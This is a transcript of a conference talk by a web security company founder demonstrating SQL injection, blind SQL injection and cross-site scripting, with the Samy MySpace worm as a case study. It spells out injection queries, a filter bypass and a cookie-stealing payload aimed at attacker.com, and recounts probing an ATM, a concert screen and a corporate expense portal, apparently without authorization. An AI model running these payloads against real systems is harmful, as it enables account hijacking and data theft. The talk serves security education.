And now I would like to invite Mr. Caleb Sima. אני מתכבד להזמין לבמה את מר קלב סימה. Please, בבקשה. 10.
All right, thank you. So before I start, I want to take a picture of the audience. So everybody has to strike a pose. Ready? All right, let's see. What can you can barely even see anything with the light, but there we go. All right. Is it good? Okay. All right, great. Now it's working. All right, so my name is Caleb Sima, and hopefully I'll show you some interesting stuff today. So this is the agenda that I'm going to go through. First, I'm going to talk about a little about who I am, and then I'm going to talk about SPY Dynamics, which those of you who are not familiar with SPY Dynamics, you probably should have heard of us by now. We're the security company that just was recently acquired by HP. Talk a little bit about what we are. And then I'm going to show you why we are here. So what is the purpose of SPY Dynamics? And that is really because of web application security or website security. So I'll show you how to break into a web app, pretty much. The fourth one is what we do. So what is our products? What are our solutions? Why is SPY around? Why did HP acquire us? Where do we fit inside of HP? And then finally, the fun stuff, because everybody likes learning how computer hackers break into web applications. And that is, I'm going to show you some live demonstrations of breaking into websites, just like I do at the top. The first one we're going to go into is cross-site scripting. And then if I have enough time, because I know I'm kind of limited on time here, I'm going to show you how I broke into HP, the HP portal. So let's get started. So the first thing is going to be, who am I? And this is the cartoon version of myself. And those of you who are familiar with South Park, that's me. I am the founder and CTO, or former founder and CTO of SPY Dynamics. And I've been in security for about 11 years. Most people look at me and they're like, well, you look like you're 17. There's no way that you could be in security that long, but I have. I've been doing security for pretty much most of my life. It's just something that I love to do. I've authored a book, Hacking Web Applications Exposed. I know some of you have seen that. You could read about that. And this is sort of the previous of my history. I've worked at ISS, which is a big internet security firm back in the States, and they do a lot of security. And my job was basically just to break into companies. That was my job. That's what I got paid for, a hacker with a job, pretty much. So that's who I am. Who is SPY Dynamics? Well, SPY Dynamics was actually the company I started back in 2000, and the goal was to, when I was breaking into websites, I learned that, you know what? Whenever a company came to me and said, hey, you need to test our security, the first thing that I always broke into was via the website. And there are no solutions to show people how hackers broke into web applications. So I started SPY. So we had about 140 employees before HP acquired us, about 1,200 or so customers, and we have a team of security experts, which are basically a bunch of computer hackers in a lab, all working on computer stuff. And we take all that technology and we integrate it into our products. Now, a lot of people say, well, how do you explain what you do to the common person? And I like to say it very simply, and that is that we create software to identify how hackers break into websites. That's what we do. So, hacking into websites, what is that? I mean, a lot of people say, well, what is hacking into a website? You know, you hear about hackers as all this black magic. You know, like, oh, there's this security stuff and hackers do things and then all of a sudden they can break in. Well, today I'm going to show you exactly how hackers break into websites. And how many of you have heard of SQL Injection before? Out there? Just a couple of you people. Oh, a pretty good amount. There was a pretty good amount. Now, how many of you are sick and tired of hearing about SQL Injection? That includes myself. I'm sick of it. I've been doing this for years, and still no one gets the point, but we're going to go through that. How many of you have heard of blind SQL Injection before? Nobody. Nobody. So, here we go. We're going to learn how a hacker breaks into a website. So, I'm going to pull up this website right here. This is a SPY Dynamics training website, but, you know, really it's a hacker DVD movie website, right? This is where you go online and you purchase movies or films. Now, one of the first things that I always do when I look at this website is I always browse around, you know, kind of get the feel of the website. You know, what does it do? Well, obviously, here we talk about movies, and we have this really ugly-looking animal on the front, which someone told me earlier was a Tasmanian devil, which is really one of the ugliest things I've ever seen. But Anyway, so let's go ahead and we'll browse around. So I'm going to click on the movie Hackers, right? So let's find out some information about hackers. As a user, I click on it and say, you know what, this looks like an interesting movie. And it kind of pulls up, the website pulls up, and I get a description of the item, and I get the DVD image that shows me what Hackers is. Now, one of the things I always pay attention to when I browse around is the URL. This thing up here at the top. For those of you in the back that can see it, it's this up here. This is very important. The reason why it's important to hackers is because they look at this. This is a way that the website communicates to that application in order to get data back. Now, a lot of you probably have worked on web applications or developed it, so you should understand this. Now, let's go ahead and let's see what happens when I go back to the home page. And let's say I click on the sneakers DVD information. So what happens is when you look at the URL, something has changed. Can any of you out there tell me what's changed? The ID number. Yes, absolutely. Which, by the way, is it just me or does Tom Hogan look like Robert Redford? I just noticed that. Okay, so anyways, off that point. So you're right. The ID number has changed. That is what has changed. Now, from a developer's perspective, what I'm going to assume here is that the developer on the back end who created this web application, he created like a SQL statement, right? And what has occurred is he said, I'm going to take this number, this ID number from the URL, and I'm going to go to the database and ask it a question and say, hey, database, tell me what product does ID number 3, and return the information to me that whatever product ID 3 is, which happens to be sneakers. The app takes the data from the database, formats it, and then displays it as we see. So that number is associated, obviously, with the data in the database. So there's this vulnerability called SQL injection. And what SQL injection is when that developer creates the SQL statement and he takes the input from the top and directly embeds it in that SQL query and goes directly to the database without any type of validation. What that is SQL injection. And that's a vulnerability. I'm going to show you why. What I do to check for SQL injection, this is what I call the poor man's method of checking, is I stick a single quote right up here in the top of the URL. What this does to the SQL database is it interrupts the question to the database. Like if I like to explain this to people, I'm sure you guys are very technical on it. I honestly don't know why I'm going through all of this, but a SQL statement starts with a beginning and ends with a SQL single quote. So if I stick one in the middle of it, it'll interrupt it. And what happens when I send that request to the web server is I get back a response that looks like this. How many of you have seen this before, browsing around websites? All of you have, right? I'm sure you have. Think back. The website that you saw this error message on means that a hacker who sees this can download the entire contents of the back-end database this web app is connected to. All right through this error message. This is called SQL injection. How does a hacker do that, you ask? Well, he piggybacks his SQL statement onto the SQL statement that the developer has created. Since you're not validating input, it's easy for me to manipulate the way things work. So what I'm going to do is I'm going to go in here and I'm going to type in my own SQL statement. What I'm saying here is I'm saying select top one. Here, let me make sure that you guys can kind of see what this looks like. I'm going to say select top one, name from sysobjects, where x type equals u. Now, to those of you who are not technical in the room, what this means in English is it says, hey database, what I want to do is I want you to take the first table name off that database that's user created. So these are things like, a database administrator will create these tables like users or logins, credit cards maybe. And then they'll go ahead and say, okay database, once you get that first table name off that database, I want you to convert it into a number. Now, what happens to a database when he tries to convert it into a number is pretty simple. He can't. He's going to puke, and he's going to return an error message, something similar to this. Now, does anybody notice anything different about this error message? Do you see it? Right here. TBL_globals. It says error, the database says error cannot convert the value TBL_globals to a number, which of course TBL_globals is the first table name in that database. Exactly what a hacker wants. So if I go back up here again and I say, okay, well what if I want to grab the next table name and name is bigger than TBL_globals. And you wait, and you get TBL underscore notes, which is the table name after that. And if you go in here, backspace it, notes, TBL underscore orders. You start seeing how this is going? I'm rotating through the database tables, extracting the information all right through the web application. Not only can I extract table names, columns, rows, and the entire database can all be pulled all from this error message. All because a developer took a SQL statement, took unvalidated input, and slapped it in. It doesn't just apply to Microsoft SQL Server. This vulnerability applies to Oracle, to DB2, to almost anything that you could think of from a database. It also applies to any language, PHP, MySQL, Perl. It doesn't matter what it is, C#, .NET, Java. All of these things are all vulnerable because it's an implementation problem. Now, when I first started doing this, and SQL Injection has been around for a long time, it was difficult for me to identify a website that didn't have SQL Injection. Literally, I would go around the web, and you couldn't find ones that were not vulnerable to this problem. So, what's happened is education has started to come across, right? Companies like SPY came across us and said, hey, wait a minute, this is a big problem. You need to worry about this. So, people and developers got educated on what SQL Injection was. So what happened is, as they started going to developers, they said, well, what's the proper way to fix this? The proper way to fix SQL Injection is to create stored procedures and parameterized queries in databases, right? No ad hoc SQL statements. But when you go to your development team as a security guy and say, hey, you need to fix all these problems, most developers say, I've got better things to do on my list of things, right? I've got functionality I need to finish. Security is not the top of my list to fix this problem. So most of the time, security people get a lot of, pushback from developers. So what they've decided is they said, well, you know what? Instead of going to the developers to fix this, there's a very simple way to fix this problem. Here's how to do it. I can fix SQL Injection for my entire website in less than a minute. Are you guys ready for this? All right, here you go. This is what the security people do. They say, okay, I'm going to go to my website, and I'm going to go to my 500 error, and I'm going to say, you know what? If hackers get data from the error messages, all I have to do is put a custom error page like this, apply it to my website so that there is no detailed data error. So let's go back here and let's try this attack again. Are you ready? I send the request and I wait for my response and I get back just a generic an error has occurred. I have effectively now solved the problem for SQL Injection, right? Yeah, of course not. It's a trick question. It's a security presentation. Nothing is secure. Okay, so, but this is what happens, is IT people think, oh, I'm going to go ahead and fix it this way, and also developers do this all the time. You go to the development group, and the developer says, well, I don't want to change all my ad hoc SQL queries to stored procedures. That takes too much time. Instead, I'm going to trap my error, and then return a default error page. Or just return back to the home page. Something simple, right? They trap it in code instead of actually fixing the problem. So now we get into something called blind SQL injection. The thing is, SQL injection is still there. The vulnerability was not fixed. But you just cannot get any error, detailed errors back. So now I have to do things just a little bit differently. So the first thing I'm going to do is, how do I detect that blind SQL injection is still there? So what I'm going to do is I'm going to go up here. Let me zoom this in for you guys. And I'm going to ask the database a question. I'm going to say, okay, go ahead and return the product ID details, just like the DVD you see here. But I'm going to ask the database a question. I'm going to say, only if 1 equals 1. Does 1 equal 1? Yes, true. And although I have heard there's probably some mathematician somewhere that will argue with me on that. So I request, does 1 equal 1? Nothing has changed. The page responds back exactly the same. I'm going to go back and say, okay, database, does 1 equal 0? False, right? 1 does not equal 0, not as far as I can tell. Tell me what happens. Oh, look at this. An error has occurred. So wait a minute, maybe I can ask the database questions. I can ask the database true and false questions. That's the only thing I can do right now. So how do you extract data that way? Well, you do it like this. So instead, what I'm going to do is I'm going to go ahead and say the exact same thing I did before, the exact same question. I'm going to say, database, I want you to go and grab the first table name out of that database, and I want you to return it to me. But instead of trying to turn it into a number so I get back an error message, What I want you to do with it is I want you to do a substring on it, or basically just return the first letter of the first table name of that database. And tell me, database, is that letter bigger than the letter A? What do you think that's going to be? True, right? Let's see what happens here. True. Okay, database, tell me, is it bigger than the letter Z? Well, of course not. It can't be bigger than the letter Z. False. So now it's like that game 21 questions, right? All you have to do is narrow it down. Eventually you say, okay, is it bigger than the letter S, right? So is it bigger than the letter S, which of course is true. And what do you think that table name is going to be? Do you remember what the table name was? What's the first letter? All right, so let's see. Is the first letter of the first table name out of that database equal to the letter T? Yes, correct. And then you go to the next letter, and the letter after that, and the letter after that, and you extract the exact same information you've extracted from an error message, but being blind. Now, what's interesting about this is that as SQL injection has risen, what ended up happening is people started figuring out, oh, SQL injection, it's an error message. All we have to do is remove that error message, so you start seeing SQL injection go down. But then you see blind SQL injection go up, because the way that they're actually fixing the SQL injection is wrong. And they're doing it this way, in this method. Now, this is all pretty complicated, right? Most people, they say, as customers, they say, okay, yeah, but a hacker, a smart hacker, is going to have to go to my website. He's going to have to go to my web pages, test for SQL injection everywhere, and then he's going to have to click on things and actually exploit me in order to do this. And the thing about it is that he doesn't really have to do that anymore. Remember, in the way that security works, all it happens is it's not that you need a million smart hackers. You just need one smart hacker, and he replicates it and automates it for the other dumb hackers, which Spy has done. So this is a tool in our toolkit in Spy Dynamics. This is, we sell some products, which I'll talk about a little bit later. And one of our tools is a tool that we call SQL Injector. The way SQL Injector works is fairly simple. All I do is instead of manually going about doing all of this stuff, I just go over here, I copy the URL, I go to my little tool called SQL Injector, I paste this in here, I click this button, I say, okay, it's SQL Injector, tell me if there's SQL injection on this website. Display to me, is there a problem? Well, as a hacker, of course, I know there's SQL injection on here. So here it is, and it tells me, oh, the database that they're running on the back end is SQL Server. I'm going to go ahead and grab the tables. Easy enough, right? I mean, there's only a button. How about grabbing the columns as well? We were thinking about selling this as a database backup tool, actually. And this is what happens. Now, SQL injection, what used to be so complex, remember, I'm downloading this entire thing all right through the web. Is the website SSL'd? Even better, because that means you can't see what I'm doing to your website. Hackers love that, right? So, in fact, now that I've grabbed all this database stuff, you can literally click on it and see the data just like you would in a database. Isn't that amazing? All right through a web application. Now, for you guys that develop web applications, I know there are a bunch of you out there. You're thinking right now about the code that you have written, and thinking, wait a minute, there's a problem. It's amazing how common this problem is in SQL injection. Okay, so let's go back. And let's talk about why we do it, right? So I've kind of demonstrated to you a little bit about SQL injection and blind SQL injection. You know there's a problem, right? Web applications have security vulnerabilities. That is one example of how hackers literally break into a web application to steal databases. It's amazing how common that vulnerability still is today. So obviously there's a huge issue. So where does Spy come into this? So this is probably fairly simple, but web applications, how did it become such a big deal? And that is because the web, you think back in 2000, it used to be really common, right? It was just static web pages with really bad graphic backgrounds and blinking fonts, right? You remember back then? But then today, the business is the web, right? No matter what company you are or who you are, not only do you have a web application, you have multiple web applications. Not only is that web application there, it's dependent upon your customers and the public in order to use that web application. It's become a very complex thing. It is the area that all things rely on. So, this is an example or a diagram of what I consider a very secure network setup. Here's what I just showed you with the web application, right? That web application was installed in a network parameter just like this. The web server was in a DMZ, protected from hackers. The app server's in a DMZ, protected. If they own that web server, you can't get to the internal structure. But most companies say that internal database where all that sensitive data is, I'm going to put that in my internal corporate network because that's where it's most secure, right? But guess what? That web application makes requests to that database server, right? The database server trusts that web application. So me, as a hacker, all I have to do is manipulate the way that web application makes its requests, and all of a sudden, I have complete control of that database server. It is a breach of trust all the way right to the core of the company. Funny enough, it's also the place that is the most public spot in a company. So, in this case, what happens is the web application risk, or the web application security gap, is why this happens. And that is that security professionals today don't know anything about web application development. They don't know how developers code. All they know about is IT security, firewalls, and encryption, and do you authenticate properly. That's what they care about. But they don't know anything about the security of the application. And application developers and QA people don't know anything about security. So that creates a gap. And the thing about it is that gap is what hackers are using to break into companies today. You remember security back in the day? You know, have you heard of buffer overflows, port scanning, network scans? That stuff is 90s, old school. Nobody does that anymore. This is where hackers attack. This is where they're targeting. It's this gap. Think about it. Think about your websites right now. You've got hundreds of web applications. You've got developers coding on it. You've got marketing people uploading content to it all the time. You've got administrators making sure the machine's administrated correctly. All those people all conglomerating on that one piece and have nothing to do with security. That's where it's at. So this is what we do. So SPY Dynamics, we created a product. We said, okay, well, how do we solve this problem, right? So I'm a security guy. When we first started SPY, it was about Web Inspect. Web Inspect was a pen testing tool, a security assessment tool sold to the IT people. Basically, you put Web Inspect up, you pointed it at a website, just like I showed you, you scanned it, you found vulnerabilities, and then you said, oh, here's where all my security issues are. It went through that app and found these problems. What we started finding throughout the life of SPY is that when we went to the security people with this report, the security people, of course, freaked out, right? Because they're like, wow, I didn't know I had this problem. But the one problem was that security people could not fix it. Because it was in the code. It was part of the application. So IT people can't install a patch to fix this issue. They have to go to the development organization. So we started having meetings with developers. And then we started knowing that developers were like, I didn't know you could do this stuff. Teach me about this. How do we solve that problem? And so we started going back. And then we go into QA Inspect, where they were like, you know what? A security vulnerability in reality is nothing more than a defect. And you guys are very familiar with that, I'm sure, right? Think about it. That error message should be a defect. It's just an ugly error message. It's a place where the app hangs, right? Or explodes. But to a security guy, it has a much different impact. So therefore, the escalation of that defect should be higher. So we decided QA Inspect is that, you know what, quality people need to understand how to test for security issues because they're really just defects with a different type of impact level. And then finally, we have Dev Inspect, where we went back to the developers. And as developers coded their apps, we said, we want to find these security vulnerabilities earlier so that as they go through the code, we can identify these and then catch them. And so we have Dev Inspect, QA Inspect, and Web Inspect as our products, and AMP to manage all of these. So that's where SPY sits today. Now, what about HP? How do we fit inside of HP? Well, this is where we are at, which I'm sure you guys are familiar with, and that is the Application Security Center. And that's our little world. And hopefully we'll see in the future how our world shapes up. Because as you guys know, we're going through the acquisition phase right now. So, on to cross-site scripting attacks. Now, I've kind of walked you through sort of a premise of how hackers break into things, what we do. Now, do you guys understand that, most of that? Or is there any questions on that? I'm sure there are, but I'm always available afterwards. So now is more fun stuff. How many of you have heard of cross-site scripting? Oh, only a couple of you. Oh, this is going to be very educating then. Very educating. Okay, cross-site scripting. This is fun. This is what simple cross-site scripting is. Have you ever seen something called log into your account? You know, you've seen something that's like username, password. What I always do is I always have like a set of passwords I always try to guess, right? It's like a reaction. You know, if I see a login and a password prompt, I'm like, oh, admin, test, you know, demo. You just have to. It's reaction. So I find this login form called test, and I put test in there, and I click login, and then the response I get back is this thing that says login problem for test. You know, your password was incorrect. Now, that's not a big deal, but what's interesting about this is it took my input, the username, test, and responded back in the output, said test. Well, that's kind of interesting. What would happen if I manipulate that input if it comes back from the server and I put in something like JavaScript? Script alert script. And then I click the submit button. What happens? Boom. JavaScript pop-up box, right? This is cross-site scripting. You look at this and say, well, what's the big deal about that? You can pop up a box that pops up in your own browser. Where's the security impact? How's this a big deal? And I'll show you why it's a big deal. Because today, everything's about user-generated content. So if I can provide malicious content that is viewed by many, all of a sudden it becomes a very big attack avenue. So this is an actual pen test of a website that I did, and it's an online dating website. How many of you do online dating? See, there's only one other person in the audience besides myself that do online dating. You guys are a bunch of liars, you know. So I'm going to assume most of you have seen at least an online dating website. And the way that it works is that you establish a profile. You create a profile of text that's seen by people that describes yourself, right? This is your data that you input. Now, in this, other people view it. That is an exact attack avenue that I'd like to use in order to exploit other people. Now, where I see most of the time is I want to find the one piece of the area that everybody sees all the time, and that's usually the subject line. Like when you do a search in an online dating website, you always return out search results with a photo and the subject line. What does that person have to say? You know? And so that is where I want my exploit to be. So I'm going to test to see if cross-site scripting is available. So I go in here and I put script alert high script, just like we did in the login password prompt, right? And I went ahead and saved that profile. And there's luckily always an online dating website. They've got these little view your profile so you can click to see what the public sees it. So I go ahead and I click that, and I view and I get back this response. Pops up and says hi. Right, just like we saw before. Very, very simple, right? Well, I know that, one, the web application is not validating their input because they're allowing JavaScript in and out. So I know I can execute code, which means I can create my exploit now. But I'm going to test real quick just to make sure that when a person searches, they don't have to click my profile, it'll just execute in the search results. So in this instance, I'm going to be a woman seeking a man, age 27 to 27, which obviously I'm not a woman seeking a man, but for demonstration purposes, in order for my profile to pull up, I will show you. So I click on within 10 miles of my zip code, I click the search button, and then on my result page, I get back, boom, the pop-up box, the hi, the little JavaScript that pops up, right? Along with this guy that's seeking the total package, as you can see right up here. Which, this guy, little does he know how famous he really is. So anyways, I know now that my code executes, right? Not only in the profile when you view it, but also in the search results when someone searches. So now is the time to plan my attack. So what does the hacker do? Well, what I'm going to do is I create an exploit profile, which you can see right up here. I create this profile to the dating website, which is my malicious content. When the victim, the girl, does a search for whatever it may be, and my search turns up, my code gets executed on her browser, right? But she doesn't know anything's going on. It just executes invisibly. But what happens is her browser invisibly goes and requests from my web server more attack data, my Trojan basically, executes it on her machine, which then sends her ID and cookie to me, the attacker, which is basically the same as me completely controlling her account at this point, right? So that's my plan. So how do I execute this? First, I create this payload. So what I write is I write image source equals http://attacker.com, which is my website, and I put document.cookie on there. So those of you that are familiar with JavaScript, what it does is it says when this code executes, it's going to grab the cookie of the person who's browsing it, who viewed this JavaScript, and it's going to send it as a request to my web server. Now, let's execute the attack. So you notice on this profile right here, I've changed my subject line to high. I had to shorten it because the app had restricted the length of my subject line. So I had to make it as a small, compact exploit as possible. So I put, okay, browser, this code will execute in the browser, go grab my payload, execute that, send the cookie to me, done, right? I go ahead and I view my profile, invisible execution. So I view the profile, nothing happens, but the code runs in the background. Let's make sure it works in the search. So when I do a search, does it execute properly? I go in there, I look at the search, completely normal, right? So if you were a victim of this exploit, you would do a search, you wouldn't see anything occur, nothing. It would just be just like a normal browsing of a website. But meanwhile, in the background, your code, your cookie, your ID is being sent to me, the attacker, which after I implemented this attack and I look at my web server logs, this is what I get back. And if you look closely, the things that are highlighted in red are the actual cookie IDs of the users that got exploited by this exploit. And now I can take this ID and pretty much act exactly as that user. Change their account details, remove their account, or if you're selfish, make only their emails come from me. So, in essence, I really didn't even have to do this attack. All I had to do is take the numbers and rotate them down. I would have grabbed other people's. Just like that. Very simple. So, that is a prime example. In real world, you notice how cross-site scripting all of a sudden became a little bit more dangerous? How user-generated content can now exploit a mass amount of people. Think about Craigslist. How many of you are familiar with Craigslist? Right. I mean, a lot of you, it's a very big website that a lot of people view. How many of you are familiar with MySpace? Come on, guys. Oh, you have Facebook? I know, I just saw that. Facebook is the MySpace, right? How many of you have profiles on MySpace? Okay, now we're starting to get some honesty coming back here. Okay, so in MySpace, it's a profile website. You create, just like an online date, you create a profile and you have little friends that are all down here at the bottom that you can view their friends' profiles. It's sort of like a little popularity contest, right? Just like high school or college or anything. It's all about who can have the most friends in MySpace. So there was this guy named Sammy. And Sammy was a guy who had 0 friends on MySpace. And he said, you know what? This sucks. I want to have more friends. So he said, you know what I'm going to do is I'm going to find a way to automate making friends on MySpace. So he went and started messing around with his profile, and he started saying, is there a way that I could get JavaScript into my profile so it would automatically add people as friends to me? So he started messing around in his profile, and he figured out a way to inject JavaScript into the profile. And it's via one very simple method. You see that Java new line script right there? MySpace was looking for the word JavaScript, and if it saw it in someone's profile, it would rip it out. It would say, well, that's insecure, we can't allow that, they rip it out. Well, when you add a new line, it breaks the word into 2, which IE and Firefox both saw as one word and rendered correctly, but MySpace missed it. So then all of a sudden he could inject JavaScript into his profile. So what did Sammy do? Well, he decided, you know what I'm going to do is in my code, now that I can inject code into my profile, I'm going to make my code say that when you view my profile, I automatically get added as a friend to you, and I update me basically as your hero. So they put Sammy, it says hero Sammy. And here's the worst part about it. I'm going to take that exact same exploit code that's in my profile and embed it into your profile. So what ended up happening is he created a web worm. Because as they viewed their profiles, they got infected, those infected profiles got infected, so on and so on and so on. And in fact, there's a dividing line in the world of security where cross-site scripting all of a sudden went from kind of fun and dangerous to extremely dangerous. And that was with the Sami worm, this worm. Because he showed computer hackers, he wasn't a security guy, but he showed computer hackers how all of a sudden you can create some really cool stuff with cross-site scripting problems. So what happened? Well, once he uploaded his profile and got everything running, he put it up on MySpace. He actually has a blog about this online. You can look it up. And this is what his blog says. 1 hour later, you have 73 friends and 1 friend request. 7 hours later, 221 friend requests. And he says, quote, "Whoa, I did not expect this much. I'm surprised it even worked." Right? 1 hour later, 480 friend requests. And then he says, "Oh, wait, it's exponential, isn't it? Crap." 1 hour later, 518 friends, 561 friend requests. 3 hours later, 2,503 friends, 6,000 friend requests. And he says, "I'm canceling my account. This has gotten out of control." Right? 5 hours later, he has 2,503 friends, 917,000 friend requests. And he says, "I timidly go to my profile to view the friends requests. It's official. I'm popular." And he did this all in a span of 1 day. He made from 0 to 1 million. In fact, it's populated, this web worm populated so fast that it crashed all of MySpace. And the MySpace servers went down, and it took them a day or two to bring them back up because of his worm, because it spread so quickly. Now, you look at this, and this is amazing. Think about the web. All of a sudden, something that was so generic, just a little pop-up box, became such a big deal, right? It became a huge deal because of the ability of what you can actually do with this. And with today's web and user-generated content, think about all the stuff that this stuff applies to. Now, Sami was kind of generic. He was an innocent guy. He wasn't even a hacker. He didn't do anything malicious. But you can do a lot more malicious things than that, including he could have captured all of their account information, their passwords. He could have even done what I call real exploitation, or captured their browser. There are products out there today, hacker products, that literally, it's JavaScript, that when you view it, I will capture your browser and control it. Anything that you do, any keywords that you type, anywhere you browse, all traffic, all gets recorded and sent to me. In fact, it's gotten so advanced that even if you exit your browser, I've already poisoned your cache so that when you open your browser again, it will reinfect itself. This is what cross-site scripting and JavaScript can do in someone that's malicious. Now, funny enough, I was sitting here in the conference room trying to get on wireless, and I kind of popped up, and I saw this wireless username and password. And so I'm like, oh, well, let's try admin, you know, the normal thing like I said before. And I click the login button, and then what do you guys see? You see the word admin in there? Oh, okay, well, let's try this again. But this time, let's put JavaScript in there. Hi. Boom. Now, as you can see, this applies everywhere. Everywhere. Something so simple can be extremely dangerous. So, going on from here, let me find, is there a chance I can do a time check real quick? Does anyone know? How much time do I have left? I have 5 minutes left. All right. This is going to be quick. Consumable input. A lot of people think that, oh, when you see user input, you can do all sorts of, you know, that's, if I validate that, then everything's fine. There are other things. For instance, near my office, there's an ATM that you go to. And when we go in there, you know, I slide in my ATM card, and it pops up and says, hey, Caleb Sima, what would you like to do? You know, withdraw from checking, check account balances. And when I stand and I look at something, you can always tell when something feels web-based. You know, you can kind of feel it. You can always tell when something looks web-based. And I was like, this ATM interface looks web-based. And when I slid in my card, it said, Caleb Sima. Where does it get that data? Well, off the card, right? So it comes off the mag stripe. So I went back to labs. We rewrote a card. We took a blank card, rewrote the name field to be JavaScript, a pop-up, went back to the ATM, slid it in, what do you think happened? Now, the same thing applies when you go to the airport, when you do electronic check-in and you slide in your card. Those are web-based terminals. It has your name in there. Think about it, right? What about RFID tags, contents of files? There was one company that they basically, they did everything that they could about SQL injection. They validated their input. They said, okay, we have no SQL injection here. And I found SQL injection because they allowed you to upload images to their site. Well, they took the file name and they threw it in a SQL query. So I just named my file name into a SQL injection attack and boom, exploited them. It's not just about user input, it's also about other types of input. Here's a funny story, another example of this, is we were at a concert, some friends and I, and we were at this big concert, and they have basically almost similar to this. They had like the big stage, and they had on the side 2 big screens, right? And as we were sitting there, it was sort of like a halftime type of thing where they're taking a break. They had like these sponsors where it's like, hey, text message your message, and it shows up on the scrolling thing up on the screen, right? So people in the audience would take out their cell phone, they would text messages, and these messages would pop up. Well, of course, the interface on the thing looked web-based. So I'm sitting next to my buddies, and I'm like, there's no way that thing's web-based. And I was like, should we do it? And I was like, okay. So I took out my phone, I put text message, put JavaScript, and I put a pop-up of hi. That was pretty much all I did. It was like, hi. I sent it, and we sat there, we waited, other messages would go by, and about 2 minutes later, boop, pop-up. Right on the screen. Okay. All right, so enough about that. Let's go on to hacking HP, right? Everybody wants to hack HP. There's one qualification before you leave this room. This cannot go anywhere. It cannot go anywhere. I am not going to show you how to hack HP, by the way. So just in case you guys are getting your hopes up, I'm not going to show you how, but I will show you the impact of the hacking that I have done. Okay? So one of the things that, we're a web security company. So the first thing in our acquisition process and all that kind of stuff is, oh, you need to learn about the HP portal. The HP portal is where everything's at. And I'm looking at that and I'm like, wow. This is bad. And so you've got a whole team of hackers that are basically like going through the portal. I mean, and when you get good at this stuff, you can just browse a website and you can tell when things are bad. So one of the things that I do on a pretty consistent basis is expense, right? I always do a lot of expenses. Trams is the wonderful system that we do for expenses, right? I mean, it's pretty good. You log in, you do all your stuff, get your credit card stuff. So this is my expense report right here, right, off of Trams. And this is not my expense report. Neither is this, or this, or this, or this, or that. Oh, wait, I wanted to show you this one. This was kind of funny. I looked at this expense report at the beginning. I was like, DirecTV client visit. Did he get a DirecTV installation expensed? I was like, there's no way this guy got this installation expense on his expense report. And then Jonathan told me later, he goes, no, actually DirecTV is a big client of ours. And I was like, oh, okay. But, I put it on myself to be the auditor of what people can expense and what they can't. So, and so, I can now go through all of these. And what's also interesting is maybe Tom might know about this one. I don't know who this expense report is. I could find out, but it looks pretty important. Maybe someone up here might know. Deutsche Bank, I mean, wow. Okay, so anyways, one of the cool things about this is not only can I be anyone on the TRAM system, I can go in and pre-approve my expenses. So I could submit an expense, go in as my manager, approve that expense, go in as his manager and approve that expense. So I was thinking about buying a new car. Now, if that's not bad enough, remember the SQL injection stuff, right? Well, look at this. Error, SQL command not properly ended. And if that's not obvious, then I'm sure you recognize this error message by now. The same one, but in a much more verbose way. So, to conclude my presentation, This is what SPY is about, web application security. And as you've seen, web security applies to everyone. So, you know, we're doing our best that we can to get our products out there. I'm sure we're going to be talking with a lot of you guys. And we'll be around. Myself and Kevin Heineman is also from SPY from Atlanta. We're here in Israel enjoying it. So if you have any questions or want to talk to us, please come by, and I would love to chat. So thank you very much. Thank you. Should I grab my stuff or should I wait? I'm going to go ahead and grab it.
Thank you, Mr. Sima. וכעת אני מתכבד להזמין לבמה